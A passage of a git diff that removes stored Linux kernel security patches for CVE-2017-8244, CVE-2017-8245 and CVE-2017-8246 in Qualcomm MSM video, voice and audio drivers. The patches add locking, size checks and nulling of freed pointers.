- "pending" : "done"); - } -- return simple_read_from_buffer(buf, count, ppos, -+ len = simple_read_from_buffer(buf, count, ppos, - dbg_buf.ptr, dbg_buf.filled_size); -+ -+ mutex_unlock(&dbg_buf.lock); -+ return len; - } - - static const struct file_operations core_info_fops = { -@@ -143,7 +154,10 @@ static const struct file_operations ssr_fops = { - struct dentry *msm_vidc_debugfs_init_drv(void) - { - bool ok = false; -- struct dentry *dir = debugfs_create_dir("msm_vidc", NULL); -+ struct dentry *dir = NULL; -+ -+ mutex_init(&dbg_buf.lock); -+ dir = debugfs_create_dir("msm_vidc", NULL); - if (IS_ERR_OR_NULL(dir)) { - dir = NULL; - goto failed_create_dir; -@@ -212,6 +226,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core, - dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n"); - goto failed_create_dir; - } -+ - if (!debugfs_create_file("info", S_IRUGO, dir, core, &core_info_fops)) { - dprintk(VIDC_ERR, "debugfs_create_file: fail\n"); - goto failed_create_dir; -@@ -266,6 +281,7 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - struct msm_vidc_inst *inst = file->private_data; - struct msm_vidc_core *core = inst ? 
inst->core : NULL; - int i, j; -+ ssize_t len = 0; - - if (!inst || !core) { - dprintk(VIDC_ERR, "Invalid params, core: %pK inst %pK\n", -@@ -277,6 +293,7 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - return 0; - } - -+ mutex_lock(&dbg_buf.lock); - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "INSTANCE: %pK (%s)\n", inst, -@@ -333,9 +350,12 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - write_str(&dbg_buf, "FBD Count: %d\n", inst->count.fbd); - - publish_unreleased_reference(inst); -- put_inst(inst); -- return simple_read_from_buffer(buf, count, ppos, -+ len = simple_read_from_buffer(buf, count, ppos, - dbg_buf.ptr, dbg_buf.filled_size); -+ -+ mutex_unlock(&dbg_buf.lock); -+ put_inst(inst); -+ return len; - } - - static const struct file_operations inst_info_fops = { -@@ -416,3 +436,8 @@ void msm_vidc_debugfs_update(struct msm_vidc_inst *inst, - } - } - -+void msm_vidc_debugfs_deinit_drv(void) -+{ -+ mutex_destroy(&dbg_buf.lock); -+} -+ -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.h b/drivers/media/platform/msm/vidc/msm_vidc_debug.h -index 55485c6..abf8d3a 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.h -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.h -@@ -126,6 +126,7 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst, - struct dentry *parent); - void msm_vidc_debugfs_update(struct msm_vidc_inst *inst, - enum msm_vidc_debugfs_event e); -+void msm_vidc_debugfs_deinit_drv(void); - - static inline void tic(struct msm_vidc_inst *i, enum profiling_points p, - char *b) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8244/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8244/4.4/0003.patch deleted file mode 100644 index 9c60f33d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8244/4.4/0003.patch +++ /dev/null 
@@ -1,165 +0,0 @@ -From fe3bdd12315656347d1bca82d920b3df1a2b0e8a Mon Sep 17 00:00:00 2001 -From: Abdulla Anam -Date: Wed, 22 Mar 2017 14:00:10 +0530 -Subject: msm: vidc: Protect debug_buffer access in info_read with lock - -Serialize core_info_read & inst_info_read with lock so that -multiple concurrent threads do not cause the write to -overflow. Also have the bound check to avoid overflow in -write_str function.. - -Change-Id: Ia18a4b94cafd69af1d367861f2499fc202f18e9f -Signed-off-by: Abdulla Anam ---- - drivers/media/platform/msm/vidc/msm_v4l2_vidc.c | 3 +++ - drivers/media/platform/msm/vidc/msm_vidc_debug.c | 33 +++++++++++++++++++++--- - drivers/media/platform/msm/vidc/msm_vidc_debug.h | 1 + - 3 files changed, 33 insertions(+), 4 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -index a632797..a8dc1d0 100644 ---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -@@ -766,6 +766,8 @@ static int __init msm_vidc_init(void) - if (rc) { - dprintk(VIDC_ERR, - "Failed to register platform driver\n"); -+ msm_vidc_debugfs_deinit_drv(); -+ debugfs_remove_recursive(vidc_driver->debugfs_root); - kfree(vidc_driver); - vidc_driver = NULL; - } -@@ -776,6 +778,7 @@ static int __init msm_vidc_init(void) - static void __exit msm_vidc_exit(void) - { - platform_driver_unregister(&msm_vidc_driver); -+ msm_vidc_debugfs_deinit_drv(); - debugfs_remove_recursive(vidc_driver->debugfs_root); - mutex_destroy(&vidc_driver->lock); - kfree(vidc_driver); -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -index 1248a1c..a9b367d 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -@@ -38,6 +38,7 @@ bool msm_vidc_debug_timeout = false; - #define MAX_DBG_BUF_SIZE 4096 - - struct debug_buffer { -+ struct mutex lock; - char 
ptr[MAX_DBG_BUF_SIZE]; - char *curr; - u32 filled_size; -@@ -64,8 +65,12 @@ static u32 write_str(struct debug_buffer *buffer, const char *fmt, ...) - { - va_list args; - u32 size; -+ -+ char *curr = buffer->curr; -+ char *end = buffer->ptr + MAX_DBG_BUF_SIZE; -+ - va_start(args, fmt); -- size = vscnprintf(buffer->curr, MAX_DBG_BUF_SIZE - 1, fmt, args); -+ size = vscnprintf(curr, end - curr, fmt, args); - va_end(args); - buffer->curr += size; - buffer->filled_size += size; -@@ -79,12 +84,15 @@ static ssize_t core_info_read(struct file *file, char __user *buf, - struct hfi_device *hdev; - struct hal_fw_info fw_info = { {0} }; - int i = 0, rc = 0; -+ ssize_t len = 0; - - if (!core || !core->device) { - dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core); - return 0; - } - hdev = core->device; -+ -+ mutex_lock(&dbg_buf.lock); - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "CORE %d: %pK\n", core->id, core); -@@ -108,8 +116,11 @@ err_fw_info: - completion_done(&core->completions[SYS_MSG_INDEX(i)]) ? 
- "pending" : "done"); - } -- return simple_read_from_buffer(buf, count, ppos, -+ len = simple_read_from_buffer(buf, count, ppos, - dbg_buf.ptr, dbg_buf.filled_size); -+ -+ mutex_unlock(&dbg_buf.lock); -+ return len; - } - - static const struct file_operations core_info_fops = { -@@ -147,7 +158,10 @@ static const struct file_operations ssr_fops = { - struct dentry *msm_vidc_debugfs_init_drv(void) - { - bool ok = false; -- struct dentry *dir = debugfs_create_dir("msm_vidc", NULL); -+ struct dentry *dir = NULL; -+ -+ mutex_init(&dbg_buf.lock); -+ dir = debugfs_create_dir("msm_vidc", NULL); - if (IS_ERR_OR_NULL(dir)) { - dir = NULL; - goto failed_create_dir; -@@ -216,6 +230,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core, - dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n"); - goto failed_create_dir; - } -+ - if (!debugfs_create_file("info", S_IRUGO, dir, core, &core_info_fops)) { - dprintk(VIDC_ERR, "debugfs_create_file: fail\n"); - goto failed_create_dir; -@@ -269,11 +284,14 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - { - struct msm_vidc_inst *inst = file->private_data; - int i, j; -+ ssize_t len = 0; - - if (!inst) { - dprintk(VIDC_ERR, "Invalid params, inst %pK\n", inst); - return 0; - } -+ -+ mutex_lock(&dbg_buf.lock); - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "INSTANCE: %pK (%s)\n", inst, -@@ -331,8 +349,10 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - - publish_unreleased_reference(inst); - -- return simple_read_from_buffer(buf, count, ppos, -+ len = simple_read_from_buffer(buf, count, ppos, - dbg_buf.ptr, dbg_buf.filled_size); -+ mutex_unlock(&dbg_buf.lock); -+ return len; - } - - static const struct file_operations inst_info_fops = { -@@ -413,3 +433,8 @@ void msm_vidc_debugfs_update(struct msm_vidc_inst *inst, - } - } - -+void msm_vidc_debugfs_deinit_drv(void) -+{ -+ mutex_destroy(&dbg_buf.lock); -+} -+ 
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.h b/drivers/media/platform/msm/vidc/msm_vidc_debug.h -index 39ac627..853ce4b 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.h -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.h -@@ -126,6 +126,7 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst, - struct dentry *parent); - void msm_vidc_debugfs_update(struct msm_vidc_inst *inst, - enum msm_vidc_debugfs_event e); -+void msm_vidc_debugfs_deinit_drv(void); - - static inline void tic(struct msm_vidc_inst *i, enum profiling_points p, - char *b) --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8245/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8245/3.10/0001.patch deleted file mode 100644 index 5d5d5ed8..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8245/3.10/0001.patch +++ /dev/null 
@@ -1,106 +0,0 @@ -From ececf97911515114030bef1fc6df630dbb706f17 Mon Sep 17 00:00:00 2001 -From: Siena Richard -Date: Tue, 28 Feb 2017 12:52:30 -0800 -Subject: drivers: soc: add size check - -Add size check to ensure the payload fits inside the declared payload -size to prevent loss of data when copying. - -CRs-Fixed: 2009224 -Signed-off-by: Siena Richard -Change-Id: I4275c626605272941143b54a7b8861b25f8e750a ---- - drivers/soc/qcom/qdsp6v2/voice_svc.c | 57 ++++++++++++++++++++++++++++-------- - 1 file changed, 44 insertions(+), 13 deletions(-) - -diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c -index 10f71b8..fe54589 100644 ---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c -+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c -@@ -368,6 +368,9 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - struct voice_svc_prvt *prtd; - struct voice_svc_write_msg *data = NULL; - uint32_t cmd; -+ struct voice_svc_register *register_data = NULL; -+ struct voice_svc_cmd_request *request_data = NULL; -+ uint32_t request_payload_size; - - pr_debug("%s\n", __func__); - -@@ -416,12 +419,19 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - */ - if (count == (sizeof(struct voice_svc_write_msg) + - sizeof(struct voice_svc_register))) { -- ret = process_reg_cmd( -- (struct voice_svc_register *)data->payload, prtd); -+ register_data = -+ (struct voice_svc_register *)data->payload; -+ if (register_data == NULL) { -+ pr_err("%s: register data is NULL", __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ ret = process_reg_cmd(register_data, prtd); - if (!ret) - ret = count; - } else { -- pr_err("%s: invalid payload size\n", __func__); -+ pr_err("%s: invalid data payload size for register command\n", -+ __func__); - ret = -EINVAL; - goto done; - } -@@ -430,19 +440,40 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - /* - * Check that count reflects the expected size to ensure - * 
sufficient memory was allocated. Since voice_svc_cmd_request -- * has a variable size, check the minimum value count must be. -+ * has a variable size, check the minimum value count must be to -+ * parse the message request then check the minimum size to hold -+ * the payload of the message request. - */ - if (count >= (sizeof(struct voice_svc_write_msg) + - sizeof(struct voice_svc_cmd_request))) { -- ret = voice_svc_send_req( -- (struct voice_svc_cmd_request *)data->payload, prtd); -- if (!ret) -- ret = count; -- } else { -- pr_err("%s: invalid payload size\n", __func__); -- ret = -EINVAL; -- goto done; -- } -+ request_data = -+ (struct voice_svc_cmd_request *)data->payload; -+ if (request_data == NULL) { -+ pr_err("%s: request data is NULL", __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ -+ request_payload_size = request_data->payload_size; -+ -+ if (count >= (sizeof(struct voice_svc_write_msg) + -+ sizeof(struct voice_svc_cmd_request) + -+ request_payload_size)) { -+ ret = voice_svc_send_req(request_data, prtd); -+ if (!ret) -+ ret = count; -+ } else { -+ pr_err("%s: invalid request payload size\n", -+ __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ } else { -+ pr_err("%s: invalid data payload size for request command\n", -+ __func__); -+ ret = -EINVAL; -+ goto done; -+ } - break; - default: - pr_debug("%s: Invalid command: %u\n", __func__, cmd); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8245/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8245/3.18/0002.patch deleted file mode 100644 index b7272ac3..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8245/3.18/0002.patch +++ /dev/null 
@@ -1,99 +0,0 @@ -From f53af3805879292423465cd0877cc7a75131ce10 Mon Sep 17 00:00:00 2001 -From: Siena Richard -Date: Tue, 28 Feb 2017 12:52:30 -0800 -Subject: drivers: soc: add size check - -Add size check to ensure the payload fits inside the declared payload -size to prevent loss of data when copying. - -CRs-Fixed: 2009224 -Signed-off-by: Siena Richard -Change-Id: I4275c626605272941143b54a7b8861b25f8e750a ---- - drivers/soc/qcom/qdsp6v2/voice_svc.c | 49 +++++++++++++++++++++++++++++------- - 1 file changed, 40 insertions(+), 9 deletions(-) - -diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c -index fbd90bc..fe54589 100644 ---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c -+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c -@@ -368,6 +368,9 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - struct voice_svc_prvt *prtd; - struct voice_svc_write_msg *data = NULL; - uint32_t cmd; -+ struct voice_svc_register *register_data = NULL; -+ struct voice_svc_cmd_request *request_data = NULL; -+ uint32_t request_payload_size; - - pr_debug("%s\n", __func__); - -@@ -416,12 +419,19 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - */ - if (count == (sizeof(struct voice_svc_write_msg) + - sizeof(struct voice_svc_register))) { -- ret = process_reg_cmd( -- (struct voice_svc_register *)data->payload, prtd); -+ register_data = -+ (struct voice_svc_register *)data->payload; -+ if (register_data == NULL) { -+ pr_err("%s: register data is NULL", __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ ret = process_reg_cmd(register_data, prtd); - if (!ret) - ret = count; - } else { -- pr_err("%s: invalid payload size\n", __func__); -+ pr_err("%s: invalid data payload size for register command\n", -+ __func__); - ret = -EINVAL; - goto done; - } -@@ -430,16 +440,37 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - /* - * Check that count reflects the expected size to ensure - * 
sufficient memory was allocated. Since voice_svc_cmd_request -- * has a variable size, check the minimum value count must be. -+ * has a variable size, check the minimum value count must be to -+ * parse the message request then check the minimum size to hold -+ * the payload of the message request. - */ - if (count >= (sizeof(struct voice_svc_write_msg) + - sizeof(struct voice_svc_cmd_request))) { -- ret = voice_svc_send_req( -- (struct voice_svc_cmd_request *)data->payload, prtd); -- if (!ret) -- ret = count; -+ request_data = -+ (struct voice_svc_cmd_request *)data->payload; -+ if (request_data == NULL) { -+ pr_err("%s: request data is NULL", __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ -+ request_payload_size = request_data->payload_size; -+ -+ if (count >= (sizeof(struct voice_svc_write_msg) + -+ sizeof(struct voice_svc_cmd_request) + -+ request_payload_size)) { -+ ret = voice_svc_send_req(request_data, prtd); -+ if (!ret) -+ ret = count; -+ } else { -+ pr_err("%s: invalid request payload size\n", -+ __func__); -+ ret = -EINVAL; -+ goto done; -+ } - } else { -- pr_err("%s: invalid payload size\n", __func__); -+ pr_err("%s: invalid data payload size for request command\n", -+ __func__); - ret = -EINVAL; - goto done; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8245/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8245/4.4/0003.patch deleted file mode 100644 index 84c63526..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8245/4.4/0003.patch +++ /dev/null 
@@ -1,106 +0,0 @@ -From 5b2f6e011ba92f28e8d7dbeb11c4ee7344c33186 Mon Sep 17 00:00:00 2001 -From: Siena Richard -Date: Tue, 28 Feb 2017 12:52:30 -0800 -Subject: drivers: soc: add size check - -Add size check to ensure the payload fits inside the declared payload -size to prevent loss of data when copying. - -CRs-Fixed: 2009224 -Signed-off-by: Siena Richard -Change-Id: I4275c626605272941143b54a7b8861b25f8e750a ---- - drivers/soc/qcom/qdsp6v2/voice_svc.c | 57 ++++++++++++++++++++++++++++-------- - 1 file changed, 44 insertions(+), 13 deletions(-) - -diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c -index 10f71b8..fe54589 100644 ---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c -+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c -@@ -368,6 +368,9 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - struct voice_svc_prvt *prtd; - struct voice_svc_write_msg *data = NULL; - uint32_t cmd; -+ struct voice_svc_register *register_data = NULL; -+ struct voice_svc_cmd_request *request_data = NULL; -+ uint32_t request_payload_size; - - pr_debug("%s\n", __func__); - -@@ -416,12 +419,19 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - */ - if (count == (sizeof(struct voice_svc_write_msg) + - sizeof(struct voice_svc_register))) { -- ret = process_reg_cmd( -- (struct voice_svc_register *)data->payload, prtd); -+ register_data = -+ (struct voice_svc_register *)data->payload; -+ if (register_data == NULL) { -+ pr_err("%s: register data is NULL", __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ ret = process_reg_cmd(register_data, prtd); - if (!ret) - ret = count; - } else { -- pr_err("%s: invalid payload size\n", __func__); -+ pr_err("%s: invalid data payload size for register command\n", -+ __func__); - ret = -EINVAL; - goto done; - } -@@ -430,19 +440,40 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf, - /* - * Check that count reflects the expected size to ensure - * 
sufficient memory was allocated. Since voice_svc_cmd_request -- * has a variable size, check the minimum value count must be. -+ * has a variable size, check the minimum value count must be to -+ * parse the message request then check the minimum size to hold -+ * the payload of the message request. - */ - if (count >= (sizeof(struct voice_svc_write_msg) + - sizeof(struct voice_svc_cmd_request))) { -- ret = voice_svc_send_req( -- (struct voice_svc_cmd_request *)data->payload, prtd); -- if (!ret) -- ret = count; -- } else { -- pr_err("%s: invalid payload size\n", __func__); -- ret = -EINVAL; -- goto done; -- } -+ request_data = -+ (struct voice_svc_cmd_request *)data->payload; -+ if (request_data == NULL) { -+ pr_err("%s: request data is NULL", __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ -+ request_payload_size = request_data->payload_size; -+ -+ if (count >= (sizeof(struct voice_svc_write_msg) + -+ sizeof(struct voice_svc_cmd_request) + -+ request_payload_size)) { -+ ret = voice_svc_send_req(request_data, prtd); -+ if (!ret) -+ ret = count; -+ } else { -+ pr_err("%s: invalid request payload size\n", -+ __func__); -+ ret = -EINVAL; -+ goto done; -+ } -+ } else { -+ pr_err("%s: invalid data payload size for request command\n", -+ __func__); -+ ret = -EINVAL; -+ goto done; -+ } - break; - default: - pr_debug("%s: Invalid command: %u\n", __func__, cmd); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.10/0003.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.10/0003.patch deleted file mode 100644 index 050ef057..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8246/3.10/0003.patch +++ /dev/null 
@@ -1,116 +0,0 @@ -From 578eb74435eccdc3df516fd744941a7d872fac6c Mon Sep 17 00:00:00 2001 -From: Xiaojun Sang -Date: Fri, 24 Feb 2017 16:13:20 +0800 -Subject: ASoC: msm: qdsp6v2: set pointer to NULL after free. - -Pointer after kfree is not sanitized. -Set pointer to NULL. - -CRs-Fixed: 2008031 -Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4 -Signed-off-by: Xiaojun Sang -Signed-off-by: Bikshapathi Kothapeta ---- - sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 1 + - sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c | 3 ++- - sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c | 3 ++- - sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c | 3 ++- - sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c | 5 ++++- - 5 files changed, 11 insertions(+), 4 deletions(-) - -diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -index 245d2f5..0cd60c8 100644 ---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c -@@ -1138,6 +1138,7 @@ static int msm_compr_free(struct snd_compr_stream *cstream) - kfree(pdata->dec_params[soc_prtd->dai_link->be_id]); - pdata->dec_params[soc_prtd->dai_link->be_id] = NULL; - kfree(prtd); -+ runtime->private_data = NULL; - - return 0; - } -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c -index d3d18917..8ab83d2 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -499,6 +499,7 @@ done: - mutex_unlock(&prtd->lock); - prtd->prepared--; - kfree(prtd); -+ runtime->private_data = NULL; - return 0; - } - static int msm_afe_prepare(struct snd_pcm_substream *substream) -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c -index 64d3fe0..507d01a 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -497,6 +497,7 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream) - - pr_debug("%s\n", __func__); - kfree(prtd); -+ runtime->private_data = NULL; - - return 0; - } -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c -index 7c69081..de126e1 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -517,6 +517,7 @@ static int msm_pcm_close(struct snd_pcm_substream *substream) - SNDRV_PCM_STREAM_PLAYBACK : - SNDRV_PCM_STREAM_CAPTURE); - kfree(prtd); -+ runtime->private_data = NULL; - return 0; - } - -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c -index 455607b..b8dbc63 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -721,6 +721,8 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream) - msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id, - SNDRV_PCM_STREAM_PLAYBACK); - kfree(prtd); -+ runtime->private_data = NULL; -+ - return 0; - } - -@@ -824,6 +826,7 @@ static int msm_pcm_capture_close(struct snd_pcm_substream *substream) - msm_pcm_routing_dereg_phy_stream(soc_prtd->dai_link->be_id, - SNDRV_PCM_STREAM_CAPTURE); - kfree(prtd); -+ runtime->private_data = NULL; - - return 0; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-8246/3.18/0004.patch b/Patches/Linux_CVEs/CVE-2017-8246/3.18/0004.patch deleted file mode 100644 index 7955c943..00000000 --- a/Patches/Linux_CVEs/CVE-2017-8246/3.18/0004.patch +++ /dev/null 
@@ -1,124 +0,0 @@
-From 30baaec8afb05abf9f794c631ad944838d498ab8 Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang
-Date: Fri, 24 Feb 2017 16:13:20 +0800
-Subject: ASoC: msm: qdsp6v2: set pointer to NULL after free
-
-Pointer after kfree is not sanitized.
-Set pointer to NULL.
-
-CRs-Fixed: 2008031
-Change-Id: Ia59a57fcd142a6ed18d168992b8da4019314afa4
-Signed-off-by: Xiaojun Sang
----
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c | 2 ++
- sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c | 3 ++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c | 4 +++-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c | 5 ++++-
- 5 files changed, 13 insertions(+), 4 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index c49a4de..90741ce 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -1599,6 +1599,7 @@ static int msm_compr_playback_free(struct snd_compr_stream *cstream)
- kfree(pdata->dec_params[soc_prtd->dai_link->be_id]);
- pdata->dec_params[soc_prtd->dai_link->be_id] = NULL;
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-@@ -1658,6 +1659,7 @@ static int msm_compr_capture_free(struct snd_compr_stream *cstream)
- q6asm_audio_client_free(ac);
-
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index d65108e..b1a1ea5 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -684,6 +684,7 @@ done:
- mutex_unlock(&prtd->lock);
- prtd->prepared--;
- kfree(prtd);
-+ runtime->private_data = NULL;
- return 0;
- }
- static int msm_afe_prepare(struct snd_pcm_substream *substream)
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-index 65c0e51..a7619fd 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -478,6 +478,7 @@ static int msm_pcm_playback_close(struct snd_pcm_substream *substream)
-
- pr_debug("%s\n", __func__);
- kfree(prtd);
-+ runtime->private_data = NULL;
-
- return 0;
- }
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-index 0612318..289049c 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-noirq.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -544,6 +544,8 @@ static int msm_pcm_close(struct snd_pcm_substream *substream)
- SNDRV_PCM_STREAM_PLAYBACK :
- SNDRV_PCM_STREAM_CAPTURE);
- kfree(prtd);
-+ runtime->private_data = NULL;
-+
- return 0;
- }
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index 07f82952..b9a1d57 100644
